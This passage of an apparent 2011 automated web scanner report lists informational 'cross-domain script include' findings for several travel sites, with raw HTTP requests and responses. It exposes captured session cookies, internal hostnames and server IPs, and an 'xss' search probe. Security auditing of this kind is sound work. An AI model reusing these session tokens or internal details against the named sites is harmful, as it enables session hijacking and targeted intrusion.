<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
18.37. http://www.rooms.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rooms.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/sc.do?d=09/07/2011&d2=03/06/2014&i=848192&c=11&v=58&IncludeAlumniRates=&IncludeSeniorRates=&state=&zipcode=&dsc=y
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 156095
Content-Type: text/html
Cache-control: private
Content-Length: 156095


<style type="text/css">
airportStyle{z-Index:20000;position:absolute;padding:0;border:solid 1px #999999;margin:0;background-color:#ffffff;color:#003399;overflow:auto;height:auto;width:auto;visib
...[SNIP]...
<!-- VO google ad for cruise page -->
           <script type="text/javascript"
               src="http://partner.googleadservices.com/gampad/google_service.js">
           </script>
...[SNIP]...
<!-- google service script -->
               <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
               </script>
...[SNIP]...
18.38. http://www.royalcaribbean.com/dealsandmore/hotdeals.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.royalcaribbean.com
Path:   /dealsandmore/hotdeals.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1 HTTP/1.1
Host: www.royalcaribbean.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; wuc=USA; MSIE_ALERT=true; s_cc=true; s_sq=royalcaribbeanprod%3D%2526pid%253DRCI%25253Asearch%25253AprocessSearch%25253Asitesearchinital%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.royalcaribbean.com%25252Fdealsandmore%25252Fhotdeals.do%25253FcS%25253DNAVBAR%252526pnav%25253D3%252526snav%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 201167
Date: Mon, 03 Oct 2011 12:44:48 GMT
Connection: close

<!DOCTYPE html>


           <html>


<head>


   <meta charset="UTF-8">
   <meta name="keywords" content=""/>
   <meta name="description" content=""/>
   
   <link rel="canonical
...[SNIP]...
<!-- this jquery declaration is needed here because it is not visible from the R_Browse_Layout.jsp parent file -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.js"></script>
...[SNIP]...
18.39. http://www.royalcaribbean.com/jsjawr/gzip_N2100786639/bundles/homePage.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.royalcaribbean.com
Path:   /jsjawr/gzip_N2100786639/bundles/homePage.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /jsjawr/gzip_N2100786639/bundles/homePage.js HTTP/1.1
Host: www.royalcaribbean.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; wuc=USA; MSIE_ALERT=true

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Content-Length: 271708
Vary: Accept-Encoding
Cache-Control: public, max-age=122885, post-check=122885, pre-check=315360000
Expires: Tue, 04 Oct 2011 22:49:06 GMT
Date: Mon, 03 Oct 2011 12:41:01 GMT
Connection: close


(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||
...[SNIP]...
</div><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
18.40. http://www1.hilton.com/common/js/pushToTalk.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /common/js/pushToTalk.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /common/js/pushToTalk.js?ver=rel-r1 HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/customersupport/site-usage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; mmcore.tst=0.798; mmid=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635903346:ss=1317635584777; NSC_qse-qgt=44153d5f3660

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:52 GMT
ETag: "594b-cf65e800"
Accept-Ranges: bytes
Content-Length: 22859
Content-Type: application/x-javascript
Cache-Control: max-age=17808
Expires: Mon, 03 Oct 2011 17:55:00 GMT
Date: Mon, 03 Oct 2011 12:58:12 GMT
Connection: close

// *******************************
// *** Push To Talk by eStara ***
// *******************************

var brandBtn = "";
var pushToTalkImage = "";


function setPushToTalkButton( button ) {
   brandB
...[SNIP]...
</A>';
       
       drawbutton6(country);
   }
   
   
           }


function drawbutton(country)
{
   d = new Date();
   
   if (isopen(d,timezone,country))
   {
       document.write('<script language="JavaScript" src="http://as00.estara.com/as/InitiateCall2.jsp?accountid=20010320"><\/script>
...[SNIP]...
18.41. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:24 GMT;path=/
Content-Length: 65409


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
</script>        
           
       
                   <script charset="UTF-8" type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3&mkt=en_US-EN_US">
</script>
...[SNIP]...
18.42. http://www2.ncl.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317645008-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Content-Length: 45949
Date: Mon, 03 Oct 2011 12:46:50 GMT
Connection: close
Set-Cookie: Cookie=R4252675302; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:46:50 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:46:50 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
</script><script type="text/javascript" src="http://view.atdmt.com/jaction/astnc1_NCLcomLandingPage_1"></script>
...[SNIP]...
</script>
<script type="text/javascript" defer="defer" src="http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_850.aspx"></script>
...[SNIP]...
18.43. http://www2.ncl.com/about/careers/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/careers/overview

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/careers/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317630853-1"
Last-Modified: Mon, 03 Oct 2011 08:34:13 +0000
X-Ncl-SLog: 10.5.44.29
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Content-Length: 41424

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="http://www2.ncl.com/sites/default/files/css/css_9662261da2926a5d21bc61d5e07d9828.css" />
<script src="http://s7.addthis.com/js/250/addthis_widget.js#username=NCL"></script>
...[SNIP]...
18.44. http://www2.ncl.com/about/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/contact-us

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/contact-us HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317631645-1"
Last-Modified: Mon, 03 Oct 2011 08:47:25 +0000
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:32 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:32 GMT; path=/; domain=ncl.com
Content-Length: 67525

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="http://www2.ncl.com/sites/default/files/css/css_9662261da2926a5d21bc61d5e07d9828.css" />
<script src="http://s7.addthis.com/js/250/addthis_widget.js#username=NCL"></script>
...[SNIP]...
18.45. http://www2.ncl.com/about/environmental-commitment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/environmental-commitment

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/environmental-commitment HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 10:33:33 +0000
ETag: "1317638013-1"
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Content-Length: 47797

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<div style="padding: 0px 0px 0px 8px">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
18.46. http://www2.ncl.com/about/staying-connected-sea-internet-access  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/staying-connected-sea-internet-access

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/staying-connected-sea-internet-access HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 13:03:50 +0000
ETag: "1317647030-1"
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:37 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:37 GMT; path=/; domain=ncl.com
Content-Length: 50010

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<div style="padding: 0px 0px 0px 8px">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
18.47. http://www2.ncl.com/cruise-destinations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /cruise-destinations

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cruise-destinations HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ncl.com/nclweb/cbooking/submitPricingQualifiers.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; Cookie=R4252675302; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_pers=%20s_nr%3D1317646123362-New%7C1320238123362%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packa%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.6.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_nr=1317646297776; s_sq=nclcom%3D%2526pid%253Dcbooking%25253A%252520bookingfunnel%25253A%252520cbooking%25253A%252520get%252520started%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww2.ncl.com%25252Fcruise-destinations%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 10:54:49 +0000
ETag: "1317639289-1"
X-Ncl-SLog: 10.5.44.28
Content-Type: text/html; charset=utf-8
Content-Length: 60847
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 12:51:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:51:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:51:16 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="http://www2.ncl.com/sites/default/files/css/css_a063bd57ca17b42296ab0599ddcd168b.css" />
<script src="http://s7.addthis.com/js/250/addthis_widget.js#username=NCL"></script>
...[SNIP]...
18.48. http://www2.ncl.com/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /faq

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /faq HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317645036-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Vary: Cookie
Date: Mon, 03 Oct 2011 13:05:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:42 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:42 GMT; path=/; domain=ncl.com
Content-Length: 83104

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="http://www2.ncl.com/sites/default/files/css/css_d6dae1fad3344278a0d90394bafb1ee0.css" />

<script src="http://s7.addthis.com/js/250/addthis_widget.js#username=NCL"></script>
...[SNIP]...
<div style="padding: 0px 0px 0px 8px">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
18.49. http://www2.ncl.com/freestyle-cruise/bon-voyage-gifts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/bon-voyage-gifts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /freestyle-cruise/bon-voyage-gifts HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317637516-1"
Last-Modified: Mon, 03 Oct 2011 10:25:16 +0000
X-Ncl-SLog: 10.5.44.28
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:27 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:27 GMT; path=/; domain=ncl.com
Content-Length: 60158

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<div style="padding: 0px 0px 0px 8px">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
18.50. http://www2.ncl.com/freestyle-cruise/casinos-at-sea/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/casinos-at-sea/overview

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /freestyle-cruise/casinos-at-sea/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317630853-1"
Last-Modified: Mon, 03 Oct 2011 08:34:13 +0000
X-Ncl-SLog: 10.5.44.29
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Content-Length: 43284

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="http://www2.ncl.com/sites/default/files/css/css_62d4c50a516856ffc95c16bfb73372a9.css" />
<script src="http://s7.addthis.com/js/250/addthis_widget.js#username=NCL"></script>
...[SNIP]...
18.51. http://www2.ncl.com/freestyle-cruise/cruise-rewards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/cruise-rewards

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /freestyle-cruise/cruise-rewards HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317635166-1"
Last-Modified: Mon, 03 Oct 2011 09:46:06 +0000
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:32 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:32 GMT; path=/; domain=ncl.com
Content-Length: 40322

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
18.52. http://www2.ncl.com/freestyle-cruise/freestyle-accommodations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/freestyle-accommodations

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /freestyle-cruise/freestyle-accommodations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317633066-1"
Last-Modified: Mon, 03 Oct 2011 09:11:06 +0000
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:45 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:45 GMT; path=/; domain=ncl.com
Content-Length: 43374

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
